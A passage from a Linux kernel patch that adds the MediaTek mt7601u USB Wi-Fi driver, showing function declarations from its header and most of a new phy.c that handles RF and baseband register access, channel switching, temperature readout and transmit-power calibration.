0); +} + +int mt7601u_write_reg_pairs(struct mt7601u_dev *dev, u32 base, + const struct mt76_reg_pair *data, int len); +int mt7601u_burst_write_regs(struct mt7601u_dev *dev, u32 offset, + const u32 *data, int n); +void mt7601u_addr_wr(struct mt7601u_dev *dev, const u32 offset, const u8 *addr); + +/* Init */ +struct mt7601u_dev *mt7601u_alloc_device(struct device *dev); +int mt7601u_init_hardware(struct mt7601u_dev *dev); +int mt7601u_register_device(struct mt7601u_dev *dev); +void mt7601u_cleanup(struct mt7601u_dev *dev); + +int mt7601u_mac_start(struct mt7601u_dev *dev); +void mt7601u_mac_stop(struct mt7601u_dev *dev); + +/* PHY */ +int mt7601u_phy_init(struct mt7601u_dev *dev); +int mt7601u_wait_bbp_ready(struct mt7601u_dev *dev); +void mt7601u_set_rx_path(struct mt7601u_dev *dev, u8 path); +void mt7601u_set_tx_dac(struct mt7601u_dev *dev, u8 path); +int mt7601u_bbp_set_bw(struct mt7601u_dev *dev, int bw); +void mt7601u_agc_save(struct mt7601u_dev *dev); +void mt7601u_agc_restore(struct mt7601u_dev *dev); +int mt7601u_phy_set_channel(struct mt7601u_dev *dev, + struct cfg80211_chan_def *chandef); +void mt7601u_phy_recalibrate_after_assoc(struct mt7601u_dev *dev); +int mt7601u_phy_get_rssi(struct mt7601u_dev *dev, + struct mt7601u_rxwi *rxwi, u16 rate); +void mt7601u_phy_con_cal_onoff(struct mt7601u_dev *dev, + struct ieee80211_bss_conf *info); + +/* MAC */ +void mt7601u_mac_work(struct work_struct *work); +void mt7601u_mac_set_protection(struct mt7601u_dev *dev, bool legacy_prot, + int ht_mode); +void mt7601u_mac_set_short_preamble(struct mt7601u_dev *dev, bool short_preamb); +void mt7601u_mac_config_tsf(struct mt7601u_dev *dev, bool enable, int interval); +void +mt7601u_mac_wcid_setup(struct mt7601u_dev *dev, u8 idx, u8 vif_idx, u8 *mac); +void mt7601u_mac_set_ampdu_factor(struct mt7601u_dev *dev); + +/* TX */ +void mt7601u_tx(struct ieee80211_hw *hw, struct ieee80211_tx_control *control, + struct sk_buff *skb); +int mt7601u_conf_tx(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + u16 queue, const struct ieee80211_tx_queue_params *params); +void mt7601u_tx_status(struct mt7601u_dev *dev, struct sk_buff *skb); +void mt7601u_tx_stat(struct work_struct *work); + +/* util */ +void mt76_remove_hdr_pad(struct sk_buff *skb); +int mt76_insert_hdr_pad(struct sk_buff *skb); + +u32 mt7601u_bbp_set_ctrlch(struct mt7601u_dev *dev, bool below); + +static inline u32 mt7601u_mac_set_ctrlch(struct mt7601u_dev *dev, bool below) +{ + return mt7601u_rmc(dev, MT_TX_BAND_CFG, 1, below); +} + +int mt7601u_dma_init(struct mt7601u_dev *dev); +void mt7601u_dma_cleanup(struct mt7601u_dev *dev); + +int mt7601u_dma_enqueue_tx(struct mt7601u_dev *dev, struct sk_buff *skb, + struct mt76_wcid *wcid, int hw_q); + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/phy.c b/drivers/net/wireless/mediatek/mt7601u/phy.c new file mode 100644 index 000000000000..1908af6add87 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/phy.c @@ -0,0 +1,1251 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "mcu.h" +#include "eeprom.h" +#include "trace.h" +#include "initvals_phy.h" + +#include + +static void mt7601u_agc_reset(struct mt7601u_dev *dev); + +static int +mt7601u_rf_wr(struct mt7601u_dev *dev, u8 bank, u8 offset, u8 value) +{ + int ret = 0; + + if (WARN_ON(!test_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state)) || + WARN_ON(offset > 63)) + return -EINVAL; + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return 0; + + mutex_lock(&dev->reg_atomic_mutex); + + if (!mt76_poll(dev, MT_RF_CSR_CFG, MT_RF_CSR_CFG_KICK, 0, 100)) { + ret = -ETIMEDOUT; + goto out; + } + + mt7601u_wr(dev, MT_RF_CSR_CFG, MT76_SET(MT_RF_CSR_CFG_DATA, value) | + MT76_SET(MT_RF_CSR_CFG_REG_BANK, bank) | + MT76_SET(MT_RF_CSR_CFG_REG_ID, offset) | + MT_RF_CSR_CFG_WR | + MT_RF_CSR_CFG_KICK); + trace_rf_write(dev, bank, offset, value); +out: + mutex_unlock(&dev->reg_atomic_mutex); + + if (ret < 0) + dev_err(dev->dev, "Error: RF write %02hhx:%02hhx failed:%d!!\n", + bank, offset, ret); + + return ret; +} + +static int +mt7601u_rf_rr(struct mt7601u_dev *dev, u8 bank, u8 offset) +{ + int ret = -ETIMEDOUT; + u32 val; + + if (WARN_ON(!test_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state)) || + WARN_ON(offset > 63)) + return -EINVAL; + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return 0xff; + + mutex_lock(&dev->reg_atomic_mutex); + + if (!mt76_poll(dev, MT_RF_CSR_CFG, MT_RF_CSR_CFG_KICK, 0, 100)) + goto out; + + mt7601u_wr(dev, MT_RF_CSR_CFG, MT76_SET(MT_RF_CSR_CFG_REG_BANK, bank) | + MT76_SET(MT_RF_CSR_CFG_REG_ID, offset) | + MT_RF_CSR_CFG_KICK); + + if (!mt76_poll(dev, MT_RF_CSR_CFG, MT_RF_CSR_CFG_KICK, 0, 100)) + goto out; + + val = mt7601u_rr(dev, MT_RF_CSR_CFG); + if (MT76_GET(MT_RF_CSR_CFG_REG_ID, val) == offset && + MT76_GET(MT_RF_CSR_CFG_REG_BANK, val) == bank) { + ret = MT76_GET(MT_RF_CSR_CFG_DATA, val); + trace_rf_read(dev, bank, offset, ret); + } +out: + mutex_unlock(&dev->reg_atomic_mutex); + + if (ret < 0) + dev_err(dev->dev, "Error: RF read %02hhx:%02hhx failed:%d!!\n", + bank, offset, ret); + + return ret; +} + +static int +mt7601u_rf_rmw(struct mt7601u_dev *dev, u8 bank, u8 offset, u8 mask, u8 val) +{ + int ret; + + ret = mt7601u_rf_rr(dev, bank, offset); + if (ret < 0) + return ret; + val |= ret & ~mask; + ret = mt7601u_rf_wr(dev, bank, offset, val); + if (ret) + return ret; + + return val; +} + +static int +mt7601u_rf_set(struct mt7601u_dev *dev, u8 bank, u8 offset, u8 val) +{ + return mt7601u_rf_rmw(dev, bank, offset, 0, val); +} + +static int +mt7601u_rf_clear(struct mt7601u_dev *dev, u8 bank, u8 offset, u8 mask) +{ + return mt7601u_rf_rmw(dev, bank, offset, mask, 0); +} + +static void mt7601u_bbp_wr(struct mt7601u_dev *dev, u8 offset, u8 val) +{ + if (WARN_ON(!test_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state)) || + test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return; + + mutex_lock(&dev->reg_atomic_mutex); + + if (!mt76_poll(dev, MT_BBP_CSR_CFG, MT_BBP_CSR_CFG_BUSY, 0, 1000)) { + dev_err(dev->dev, "Error: BBP write %02hhx failed!!\n", offset); + goto out; + } + + mt7601u_wr(dev, MT_BBP_CSR_CFG, + MT76_SET(MT_BBP_CSR_CFG_VAL, val) | + MT76_SET(MT_BBP_CSR_CFG_REG_NUM, offset) | + MT_BBP_CSR_CFG_RW_MODE | MT_BBP_CSR_CFG_BUSY); + trace_bbp_write(dev, offset, val); +out: + mutex_unlock(&dev->reg_atomic_mutex); +} + +static int mt7601u_bbp_rr(struct mt7601u_dev *dev, u8 offset) +{ + u32 val; + int ret = -ETIMEDOUT; + + if (WARN_ON(!test_bit(MT7601U_STATE_WLAN_RUNNING, &dev->state))) + return -EINVAL; + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return 0xff; + + mutex_lock(&dev->reg_atomic_mutex); + + if (!mt76_poll(dev, MT_BBP_CSR_CFG, MT_BBP_CSR_CFG_BUSY, 0, 1000)) + goto out; + + mt7601u_wr(dev, MT_BBP_CSR_CFG, + MT76_SET(MT_BBP_CSR_CFG_REG_NUM, offset) | + MT_BBP_CSR_CFG_RW_MODE | MT_BBP_CSR_CFG_BUSY | + MT_BBP_CSR_CFG_READ); + + if (!mt76_poll(dev, MT_BBP_CSR_CFG, MT_BBP_CSR_CFG_BUSY, 0, 1000)) + goto out; + + val = mt7601u_rr(dev, MT_BBP_CSR_CFG); + if (MT76_GET(MT_BBP_CSR_CFG_REG_NUM, val) == offset) { + ret = MT76_GET(MT_BBP_CSR_CFG_VAL, val); + trace_bbp_read(dev, offset, ret); + } +out: + mutex_unlock(&dev->reg_atomic_mutex); + + if (ret < 0) + dev_err(dev->dev, "Error: BBP read %02hhx failed:%d!!\n", + offset, ret); + + return ret; +} + +static int mt7601u_bbp_rmw(struct mt7601u_dev *dev, u8 offset, u8 mask, u8 val) +{ + int ret; + + ret = mt7601u_bbp_rr(dev, offset); + if (ret < 0) + return ret; + val |= ret & ~mask; + mt7601u_bbp_wr(dev, offset, val); + + return val; +} + +static u8 mt7601u_bbp_rmc(struct mt7601u_dev *dev, u8 offset, u8 mask, u8 val) +{ + int ret; + + ret = mt7601u_bbp_rr(dev, offset); + if (ret < 0) + return ret; + val |= ret & ~mask; + if (ret != val) + mt7601u_bbp_wr(dev, offset, val); + + return val; +} + +int mt7601u_wait_bbp_ready(struct mt7601u_dev *dev) +{ + int i = 20; + u8 val; + + do { + val = mt7601u_bbp_rr(dev, MT_BBP_REG_VERSION); + if (val && ~val) + break; + } while (--i); + + if (!i) { + dev_err(dev->dev, "Error: BBP is not ready\n"); + return -EIO; + } + + return 0; +} + +u32 mt7601u_bbp_set_ctrlch(struct mt7601u_dev *dev, bool below) +{ + return mt7601u_bbp_rmc(dev, 3, 0x20, below ? 0x20 : 0); +} + +int mt7601u_phy_get_rssi(struct mt7601u_dev *dev, + struct mt7601u_rxwi *rxwi, u16 rate) +{ + static const s8 lna[2][2][3] = { + /* main LNA */ { + /* bw20 */ { -2, 15, 33 }, + /* bw40 */ { 0, 16, 34 } + }, + /* aux LNA */ { + /* bw20 */ { -2, 15, 33 }, + /* bw40 */ { -2, 16, 34 } + } + }; + int bw = MT76_GET(MT_RXWI_RATE_BW, rate); + int aux_lna = MT76_GET(MT_RXWI_ANT_AUX_LNA, rxwi->ant); + int lna_id = MT76_GET(MT_RXWI_GAIN_RSSI_LNA_ID, rxwi->gain); + int val; + + if (lna_id) /* LNA id can be 0, 2, 3. */ + lna_id--; + + val = 8; + val -= lna[aux_lna][bw][lna_id]; + val -= MT76_GET(MT_RXWI_GAIN_RSSI_VAL, rxwi->gain); + val -= dev->ee->lna_gain; + val -= dev->ee->rssi_offset[0]; + + return val; +} + +static void mt7601u_vco_cal(struct mt7601u_dev *dev) +{ + mt7601u_rf_wr(dev, 0, 4, 0x0a); + mt7601u_rf_wr(dev, 0, 5, 0x20); + mt7601u_rf_set(dev, 0, 4, BIT(7)); + msleep(2); +} + +static int mt7601u_set_bw_filter(struct mt7601u_dev *dev, bool cal) +{ + u32 filter = 0; + int ret; + + if (!cal) + filter |= 0x10000; + if (dev->bw != MT_BW_20) + filter |= 0x00100; + + /* TX */ + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_BW, filter | 1); + if (ret) + return ret; + /* RX */ + return mt7601u_mcu_calibrate(dev, MCU_CAL_BW, filter); +} + +static int mt7601u_load_bbp_temp_table_bw(struct mt7601u_dev *dev) +{ + const struct reg_table *t; + + if (WARN_ON(dev->temp_mode > MT_TEMP_MODE_LOW)) + return -EINVAL; + + t = &bbp_mode_table[dev->temp_mode][dev->bw]; + + return mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, t->regs, t->n); +} + +static int mt7601u_bbp_temp(struct mt7601u_dev *dev, int mode, const char *name) +{ + const struct reg_table *t; + int ret; + + if (dev->temp_mode == mode) + return 0; + + dev->temp_mode = mode; + trace_temp_mode(dev, mode); + + t = bbp_mode_table[dev->temp_mode]; + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + t[2].regs, t[2].n); + if (ret) + return ret; + + return mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + t[dev->bw].regs, t[dev->bw].n); +} + +static void mt7601u_apply_ch14_fixup(struct mt7601u_dev *dev, int hw_chan) +{ + struct mt7601u_rate_power *t = &dev->ee->power_rate_table; + + if (hw_chan != 14 || dev->bw != MT_BW_20) { + mt7601u_bbp_rmw(dev, 4, 0x20, 0); + mt7601u_bbp_wr(dev, 178, 0xff); + + t->cck[0].bw20 = dev->ee->real_cck_bw20[0]; + t->cck[1].bw20 = dev->ee->real_cck_bw20[1]; + } else { /* Apply CH14 OBW fixup */ + mt7601u_bbp_wr(dev, 4, 0x60); + mt7601u_bbp_wr(dev, 178, 0); + + /* Note: vendor code is buggy here for negative values */ + t->cck[0].bw20 = dev->ee->real_cck_bw20[0] - 2; + t->cck[1].bw20 = dev->ee->real_cck_bw20[1] - 2; + } +} + +static int __mt7601u_phy_set_channel(struct mt7601u_dev *dev, + struct cfg80211_chan_def *chandef) +{ +#define FREQ_PLAN_REGS 4 + static const u8 freq_plan[14][FREQ_PLAN_REGS] = { + { 0x99, 0x99, 0x09, 0x50 }, + { 0x46, 0x44, 0x0a, 0x50 }, + { 0xec, 0xee, 0x0a, 0x50 }, + { 0x99, 0x99, 0x0b, 0x50 }, + { 0x46, 0x44, 0x08, 0x51 }, + { 0xec, 0xee, 0x08, 0x51 }, + { 0x99, 0x99, 0x09, 0x51 }, + { 0x46, 0x44, 0x0a, 0x51 }, + { 0xec, 0xee, 0x0a, 0x51 }, + { 0x99, 0x99, 0x0b, 0x51 }, + { 0x46, 0x44, 0x08, 0x52 }, + { 0xec, 0xee, 0x08, 0x52 }, + { 0x99, 0x99, 0x09, 0x52 }, + { 0x33, 0x33, 0x0b, 0x52 }, + }; + struct mt76_reg_pair channel_freq_plan[FREQ_PLAN_REGS] = { + { 17, 0 }, { 18, 0 }, { 19, 0 }, { 20, 0 }, + }; + struct mt76_reg_pair bbp_settings[3] = { + { 62, 0x37 - dev->ee->lna_gain }, + { 63, 0x37 - dev->ee->lna_gain }, + { 64, 0x37 - dev->ee->lna_gain }, + }; + + struct ieee80211_channel *chan = chandef->chan; + enum nl80211_channel_type chan_type = + cfg80211_get_chandef_type(chandef); + struct mt7601u_rate_power *t = &dev->ee->power_rate_table; + int chan_idx; + bool chan_ext_below; + u8 bw; + int i, ret; + + bw = MT_BW_20; + chan_ext_below = (chan_type == NL80211_CHAN_HT40MINUS); + chan_idx = chan->hw_value - 1; + + if (chandef->width == NL80211_CHAN_WIDTH_40) { + bw = MT_BW_40; + + if (chan_idx > 1 && chan_type == NL80211_CHAN_HT40MINUS) + chan_idx -= 2; + else if (chan_idx < 12 && chan_type == NL80211_CHAN_HT40PLUS) + chan_idx += 2; + else + dev_err(dev->dev, "Error: invalid 40MHz channel!!\n"); + } + + if (bw != dev->bw || chan_ext_below != dev->chan_ext_below) { + dev_dbg(dev->dev, "Info: switching HT mode bw:%d below:%d\n", + bw, chan_ext_below); + + mt7601u_bbp_set_bw(dev, bw); + + mt7601u_bbp_set_ctrlch(dev, chan_ext_below); + mt7601u_mac_set_ctrlch(dev, chan_ext_below); + dev->chan_ext_below = chan_ext_below; + } + + for (i = 0; i < FREQ_PLAN_REGS; i++) + channel_freq_plan[i].value = freq_plan[chan_idx][i]; + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_RF, + channel_freq_plan, FREQ_PLAN_REGS); + if (ret) + return ret; + + mt7601u_rmw(dev, MT_TX_ALC_CFG_0, 0x3f3f, + dev->ee->chan_pwr[chan_idx] & 0x3f); + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + bbp_settings, ARRAY_SIZE(bbp_settings)); + if (ret) + return ret; + + mt7601u_vco_cal(dev); + mt7601u_bbp_set_bw(dev, bw); + ret = mt7601u_set_bw_filter(dev, false); + if (ret) + return ret; + + mt7601u_apply_ch14_fixup(dev, chan->hw_value); + mt7601u_wr(dev, MT_TX_PWR_CFG_0, int_to_s6(t->ofdm[1].bw20) << 24 | + int_to_s6(t->ofdm[0].bw20) << 16 | + int_to_s6(t->cck[1].bw20) << 8 | + int_to_s6(t->cck[0].bw20)); + + if (test_bit(MT7601U_STATE_SCANNING, &dev->state)) + mt7601u_agc_reset(dev); + + dev->chandef = *chandef; + + return 0; +} + +int mt7601u_phy_set_channel(struct mt7601u_dev *dev, + struct cfg80211_chan_def *chandef) +{ + int ret; + + cancel_delayed_work_sync(&dev->cal_work); + cancel_delayed_work_sync(&dev->freq_cal.work); + + mutex_lock(&dev->hw_atomic_mutex); + ret = __mt7601u_phy_set_channel(dev, chandef); + mutex_unlock(&dev->hw_atomic_mutex); + if (ret) + return ret; + + if (test_bit(MT7601U_STATE_SCANNING, &dev->state)) + return 0; + + ieee80211_queue_delayed_work(dev->hw, &dev->cal_work, + MT_CALIBRATE_INTERVAL); + if (dev->freq_cal.enabled) + ieee80211_queue_delayed_work(dev->hw, &dev->freq_cal.work, + MT_FREQ_CAL_INIT_DELAY); + return 0; +} + +#define BBP_R47_FLAG GENMASK(2, 0) +#define BBP_R47_F_TSSI 0 +#define BBP_R47_F_PKT_T 1 +#define BBP_R47_F_TX_RATE 2 +#define BBP_R47_F_TEMP 4 +/** + * mt7601u_bbp_r47_get - read value through BBP R47/R49 pair + * @dev: pointer to adapter structure + * @reg: value of BBP R47 before the operation + * @flag: one of the BBP_R47_F_* flags + * + * Convenience helper for reading values through BBP R47/R49 pair. + * Takes old value of BBP R47 as @reg, because callers usually have it + * cached already. + * + * Return: value of BBP R49. + */ +static u8 mt7601u_bbp_r47_get(struct mt7601u_dev *dev, u8 reg, u8 flag) +{ + flag |= reg & ~BBP_R47_FLAG; + mt7601u_bbp_wr(dev, 47, flag); + usleep_range(500, 700); + return mt7601u_bbp_rr(dev, 49); +} + +static s8 mt7601u_read_bootup_temp(struct mt7601u_dev *dev) +{ + u8 bbp_val, temp; + u32 rf_bp, rf_set; + int i; + + rf_set = mt7601u_rr(dev, MT_RF_SETTING_0); + rf_bp = mt7601u_rr(dev, MT_RF_BYPASS_0); + + mt7601u_wr(dev, MT_RF_BYPASS_0, 0); + mt7601u_wr(dev, MT_RF_SETTING_0, 0x00000010); + mt7601u_wr(dev, MT_RF_BYPASS_0, 0x00000010); + + bbp_val = mt7601u_bbp_rmw(dev, 47, 0, 0x10); + + mt7601u_bbp_wr(dev, 22, 0x40); + + for (i = 100; i && (bbp_val & 0x10); i--) + bbp_val = mt7601u_bbp_rr(dev, 47); + + temp = mt7601u_bbp_r47_get(dev, bbp_val, BBP_R47_F_TEMP); + + mt7601u_bbp_wr(dev, 22, 0); + + bbp_val = mt7601u_bbp_rr(dev, 21); + bbp_val |= 0x02; + mt7601u_bbp_wr(dev, 21, bbp_val); + bbp_val &= ~0x02; + mt7601u_bbp_wr(dev, 21, bbp_val); + + mt7601u_wr(dev, MT_RF_BYPASS_0, 0); + mt7601u_wr(dev, MT_RF_SETTING_0, rf_set); + mt7601u_wr(dev, MT_RF_BYPASS_0, rf_bp); + + trace_read_temp(dev, temp); + return temp; +} + +static s8 mt7601u_read_temp(struct mt7601u_dev *dev) +{ + int i; + u8 val; + s8 temp; + + val = mt7601u_bbp_rmw(dev, 47, 0x7f, 0x10); + + /* Note: this rarely succeeds, temp can change even if it fails. */ + for (i = 100; i && (val & 0x10); i--) + val = mt7601u_bbp_rr(dev, 47); + + temp = mt7601u_bbp_r47_get(dev, val, BBP_R47_F_TEMP); + + trace_read_temp(dev, temp); + return temp; +} + +static void mt7601u_rxdc_cal(struct mt7601u_dev *dev) +{ + static const struct mt76_reg_pair intro[] = { + { 158, 0x8d }, { 159, 0xfc }, + { 158, 0x8c }, { 159, 0x4c }, + }, outro[] = { + { 158, 0x8d }, { 159, 0xe0 }, + }; + u32 mac_ctrl; + int i, ret; + + mac_ctrl = mt7601u_rr(dev, MT_MAC_SYS_CTRL); + mt7601u_wr(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_ENABLE_RX); + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + intro, ARRAY_SIZE(intro)); + if (ret) + dev_err(dev->dev, "%s intro failed:%d\n", __func__, ret); + + for (i = 20; i; i--) { + usleep_range(300, 500); + + mt7601u_bbp_wr(dev, 158, 0x8c); + if (mt7601u_bbp_rr(dev, 159) == 0x0c) + break; + } + if (!i) + dev_err(dev->dev, "%s timed out\n", __func__); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, 0); + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, + outro, ARRAY_SIZE(outro)); + if (ret) + dev_err(dev->dev, "%s outro failed:%d\n", __func__, ret); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, mac_ctrl); +} + +void mt7601u_phy_recalibrate_after_assoc(struct mt7601u_dev *dev) +{ + mt7601u_mcu_calibrate(dev, MCU_CAL_DPD, dev->curr_temp); + + mt7601u_rxdc_cal(dev); +} + +/* Note: function copied from vendor driver */ +static s16 lin2dBd(u16 linear) +{ + short exp = 0; + unsigned int mantisa; + int app, dBd; + + if (WARN_ON(!linear)) + return -10000; + + mantisa = linear; + + exp = fls(mantisa) - 16; + if (exp > 0) + mantisa >>= exp; + else + mantisa <<= abs(exp); + + if (mantisa <= 0xb800) + app = (mantisa + (mantisa >> 3) + (mantisa >> 4) - 0x9600); + else + app = (mantisa - (mantisa >> 3) - (mantisa >> 6) - 0x5a00); + if (app < 0) + app = 0; + + dBd = ((15 + exp) << 15) + app; + dBd = (dBd << 2) + (dBd << 1) + (dBd >> 6) + (dBd >> 7); + dBd = (dBd >> 10); + + return dBd; +} + +static void +mt7601u_set_initial_tssi(struct mt7601u_dev *dev, s16 tssi_db, s16 tssi_hvga_db) +{ + struct tssi_data *d = &dev->ee->tssi_data; + int init_offset; + + init_offset = -((tssi_db * d->slope + d->offset[1]) / 4096) + 10; + + mt76_rmw(dev, MT_TX_ALC_CFG_1, MT_TX_ALC_CFG_1_TEMP_COMP, + int_to_s6(init_offset) & MT_TX_ALC_CFG_1_TEMP_COMP); +} + +static void mt7601u_tssi_dc_gain_cal(struct mt7601u_dev *dev) +{ + u8 rf_vga, rf_mixer, bbp_r47; + int i, j; + s8 res[4]; + s16 tssi_init_db, tssi_init_hvga_db; + + mt7601u_wr(dev, MT_RF_SETTING_0, 0x00000030); + mt7601u_wr(dev, MT_RF_BYPASS_0, 0x000c0030); + mt7601u_wr(dev, MT_MAC_SYS_CTRL, 0); + + mt7601u_bbp_wr(dev, 58, 0); + mt7601u_bbp_wr(dev, 241, 0x2); + mt7601u_bbp_wr(dev, 23, 0x8); + bbp_r47 = mt7601u_bbp_rr(dev, 47); + + /* Set VGA gain */ + rf_vga = mt7601u_rf_rr(dev, 5, 3); + mt7601u_rf_wr(dev, 5, 3, 8); + + /* Mixer disable */ + rf_mixer = mt7601u_rf_rr(dev, 4, 39); + mt7601u_rf_wr(dev, 4, 39, 0); + + for (i = 0; i < 4; i++) { + mt7601u_rf_wr(dev, 4, 39, (i & 1) ? rf_mixer : 0); + + mt7601u_bbp_wr(dev, 23, (i < 2) ? 0x08 : 0x02); + mt7601u_rf_wr(dev, 5, 3, (i < 2) ? 0x08 : 0x11); + + /* BBP TSSI initial and soft reset */ + mt7601u_bbp_wr(dev, 22, 0); + mt7601u_bbp_wr(dev, 244, 0); + + mt7601u_bbp_wr(dev, 21, 1); + udelay(1); + mt7601u_bbp_wr(dev, 21, 0); + + /* TSSI measurement */ + mt7601u_bbp_wr(dev, 47, 0x50); + mt7601u_bbp_wr(dev, (i & 1) ? 244 : 22, (i & 1) ? 0x31 : 0x40); + + for (j = 20; j; j--) + if (!(mt7601u_bbp_rr(dev, 47) & 0x10)) + break; + if (!j) + dev_err(dev->dev, "%s timed out\n", __func__); + + /* TSSI read */ + mt7601u_bbp_wr(dev, 47, 0x40); + res[i] = mt7601u_bbp_rr(dev, 49); + } + + tssi_init_db = lin2dBd((short)res[1] - res[0]); + tssi_init_hvga_db = lin2dBd(((short)res[3] - res[2]) * 4); + dev->tssi_init = res[0]; + dev->tssi_init_hvga = res[2]; + dev->tssi_init_hvga_offset_db = tssi_init_hvga_db - tssi_init_db; + + dev_dbg(dev->dev, + "TSSI_init:%hhx db:%hx hvga:%hhx hvga_db:%hx off_db:%hx\n", + dev->tssi_init, tssi_init_db, dev->tssi_init_hvga, + tssi_init_hvga_db, dev->tssi_init_hvga_offset_db); + + mt7601u_bbp_wr(dev, 22, 0); + mt7601u_bbp_wr(dev, 244, 0); + + mt7601u_bbp_wr(dev, 21, 1); + udelay(1); + mt7601u_bbp_wr(dev, 21, 0); + + mt7601u_wr(dev, MT_RF_BYPASS_0, 0); + mt7601u_wr(dev, MT_RF_SETTING_0, 0); + + mt7601u_rf_wr(dev, 5, 3, rf_vga); + mt7601u_rf_wr(dev, 4, 39, rf_mixer); + mt7601u_bbp_wr(dev, 47, bbp_r47); + + mt7601u_set_initial_tssi(dev, tssi_init_db, tssi_init_hvga_db); +} + +static int mt7601u_temp_comp(struct mt7601u_dev *dev, bool on) +{ + int ret, temp, hi_temp = 400, lo_temp = -200; + + temp = (dev->raw_temp - dev->ee->ref_temp) * MT_EE_TEMPERATURE_SLOPE; + dev->curr_temp = temp; + + /* DPD Calibration */ + if (temp - dev->dpd_temp > 450 || temp - dev->dpd_temp < -450) { + dev->dpd_temp = temp; + + ret = mt7601u_mcu_calibrate(dev, MCU_CAL_DPD, dev->dpd_temp); + if (ret) + return ret; + + mt7601u_vco_cal(dev); + + dev_dbg(dev->dev, "Recalibrate DPD\n"); + } + + /* PLL Lock Protect */ + if (temp < -50 && !dev->pll_lock_protect) { /* < 20C */ + dev->pll_lock_protect = true; + + mt7601u_rf_wr(dev, 4, 4, 6); + mt7601u_rf_clear(dev, 4, 10, 0x30); + + dev_dbg(dev->dev, "PLL lock protect on - too cold\n"); + } else if (temp > 50 && dev->pll_lock_protect) { /* > 30C */ + dev->pll_lock_protect = false; + + mt7601u_rf_wr(dev, 4, 4, 0); + mt7601u_rf_rmw(dev, 4, 10, 0x30, 0x10); + + dev_dbg(dev->dev, "PLL lock protect off\n"); + } + + if (on) { + hi_temp -= 50; + lo_temp -= 50; + } + + /* BBP CR for H, L, N temperature */ + if (temp > hi_temp) + return mt7601u_bbp_temp(dev, MT_TEMP_MODE_HIGH, "high"); + else if (temp > lo_temp) + return mt7601u_bbp_temp(dev, MT_TEMP_MODE_NORMAL, "normal"); + else + return mt7601u_bbp_temp(dev, MT_TEMP_MODE_LOW, "low"); +} + +/* Note: this is used only with TSSI, we can just use trgt_pwr from eeprom. */ +static int mt7601u_current_tx_power(struct mt7601u_dev *dev) +{ + return dev->ee->chan_pwr[dev->chandef.chan->hw_value - 1]; +} + +static bool mt7601u_use_hvga(struct mt7601u_dev *dev) +{ + return !(mt7601u_current_tx_power(dev) > 20); +} + +static s16 +mt7601u_phy_rf_pa_mode_val(struct mt7601u_dev *dev, int phy_mode, int tx_rate) +{ + static const s16 decode_tb[] = { 0, 8847, -5734, -5734 }; + u32 reg; + + switch (phy_mode) { + case MT_PHY_TYPE_OFDM: + tx_rate += 4; + case MT_PHY_TYPE_CCK: + reg = dev->rf_pa_mode[0]; + break; + default: + reg = dev->rf_pa_mode[1]; + break; + } + + return decode_tb[(reg >> (tx_rate * 2)) & 0x3]; +} + +static struct mt7601u_tssi_params +mt7601u_tssi_params_get(struct mt7601u_dev *dev) +{ + static const u8 ofdm_pkt2rate[8] = { 6, 4, 2, 0, 7, 5, 3, 1 }; + static const int static_power[4] = { 0, -49152, -98304, 49152 }; + struct mt7601u_tssi_params p; + u8 bbp_r47, pkt_type, tx_rate; + struct power_per_rate *rate_table; + + bbp_r47 = mt7601u_bbp_rr(dev, 47); + + p.tssi0 = mt7601u_bbp_r47_get(dev, bbp_r47, BBP_R47_F_TSSI); + dev->raw_temp = mt7601u_bbp_r47_get(dev, bbp_r47, BBP_R47_F_TEMP); + pkt_type = mt7601u_bbp_r47_get(dev, bbp_r47, BBP_R47_F_PKT_T); + + p.trgt_power = mt7601u_current_tx_power(dev); + + switch (pkt_type & 0x03) { + case MT_PHY_TYPE_CCK: + tx_rate = (pkt_type >> 4) & 0x03; + rate_table = dev->ee->power_rate_table.cck; + break; + + case MT_PHY_TYPE_OFDM: + tx_rate = ofdm_pkt2rate[(pkt_type >> 4) & 0x07]; + rate_table = dev->ee->power_rate_table.ofdm; + break; + + default: + tx_rate = mt7601u_bbp_r47_get(dev, bbp_r47, BBP_R47_F_TX_RATE); + tx_rate &= 0x7f; + rate_table = dev->ee->power_rate_table.ht; + break; + } + + if (dev->bw == MT_BW_20) + p.trgt_power += rate_table[tx_rate / 2].bw20; + else + p.trgt_power += rate_table[tx_rate / 2].bw40; + + p.trgt_power <<= 12; + + dev_dbg(dev->dev, "tx_rate:%02hhx pwr:%08x\n", tx_rate, p.trgt_power); + + p.trgt_power += mt7601u_phy_rf_pa_mode_val(dev, pkt_type & 0x03, + tx_rate); + + /* Channel 14, cck, bw20 */ + if ((pkt_type & 0x03) == MT_PHY_TYPE_CCK) { + if (mt7601u_bbp_rr(dev, 4) & 0x20) + p.trgt_power += mt7601u_bbp_rr(dev, 178) ? 18022 : 9830; + else + p.trgt_power += mt7601u_bbp_rr(dev, 178) 